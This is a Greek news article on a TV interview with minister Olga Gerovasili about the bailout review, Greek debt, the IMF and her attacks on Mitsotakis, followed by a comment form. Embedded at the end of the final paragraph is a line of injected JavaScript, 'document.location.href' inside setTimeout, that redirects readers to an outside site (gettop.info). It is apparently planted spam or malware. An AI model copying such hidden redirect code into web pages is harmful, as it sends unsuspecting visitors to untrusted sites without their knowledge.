Γεροβασίλη: Ουδέποτε ήμασταν σύμφωνοι με το ΔΝΤ

0
13

Την πεποίθηση ότι το κλείσιμο της δεύτερης αξιολόγηση θα αποτελέσει το «μέσο» για να πραγματοποιηθεί η συζήτηση για τη ρύθμιση του χρέους εξέφρασε σε τηλεοπτική της συνέντευξη η Όλγα Γεροβασίλη, που παράλληλα τόνισε ότι η δεύτερη αξιολόγηση έχει κλείσει στα περισσότερα θέματα. Η υπουργός Διοικητικής Ανασυγκρότησης εξαπέλυσε σφοδρή επίθεση εναντίον του Κυριάκου Μητσοτάκη, κατηγορώντας τον ότι επιθυμεί ένα τέταρτο μνημόνιο.

«Έχει φτάσει σε αρκετά προχωρημένο σημείο η διαπραγμάτευση, στα περισσότερα θέματα έχει κλείσει. Θα δώσουμε τη μάχη μέχρι την τελευταία στιγμή μη υποχωρώντας από βασικές αρχές» είπε η κ. Γεροβασίλη, η οποία προχώρησε και σε διαβεβαιώσεις ότι οι αλλαγές που ακούγονται για τις εργασιακές σχέσεις δεν θα πραγματοποιηθούν.

«Η δεύτερη αξιολόγηση είναι το μέσο για να φτάσουμε στο στόχο, δηλαδή να έχουμε συζήτηση για τη ρύθμιση του χρέους. Το ελληνικό χρέος δεν είναι βιώσιμο» τόνισε η υπουργός.

Η υπουργός επέμεινε ότι κανείς δεν μίλησε για τέταρτο μνημόνιο βάλλοντας κατά της αξιωματικής αντιπολίτευσης: «Το τέταρτο μνημόνιο είναι ευχή της ΝΔ και του κ. Μητσοτάκη. Επικίνδυνο παιχνίδι η αποσταθεροποίηση της χώρας που παίζουν ορισμένοι» ανέφερε χαρακτηριστικά, με αφορμή το αίτημα του προέδρου της ΝΔ για εκλογές.

Την ίδια ώρα, η κ. Γεροβασίλη ανέφερε ότι ο κ. Μητσοτάκης κάνει την πρόταση για εκλογές ελλείψει επιχειρημάτων και προτάσεων. «Με εκλογές σταματάει η δεύτερη αξιολόγηση, σταματάει η συζήτηση για το χρέος, σταματάει η πρόβλεψη για ποσοτική χαλάρωση και η χώρα επανέρχεται σε τρομακτικά αδιέξοδα» είπε η κ. Γεροβασίλη.

Στρέφοντας τα «πυρά» της εναντίον του ΔΝΤ, η κ. Γεροβασίλη τόνισε ότι όλοι γνωρίζουν τι εννοεί το Ταμείο όταν μιλάει για μεταρρυθμίσεις. «Ουδέποτε ήμασταν σύμφωνοι με το ΔΝΤ και έχει αλλάξει ο συσχετισμός δυνάμεων».

«Έχουμε υπεραπόδοση εσόδων έχουμε υπερκαλύψει τους στόχους», σημείωσε ακόμη, ενώ πρόσθεσε πως «η κυβέρνηση στηρίζεται από το λαό… περπατάω στο δρόμο καθημερινά. Βλέπει ο λαός ότι η κυβέρνηση προσπαθεί να στηρίξει την καθημερινότητα και να βγάλει τη χώρα από το μνημόνιο» δήλωσε η υπουργός. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here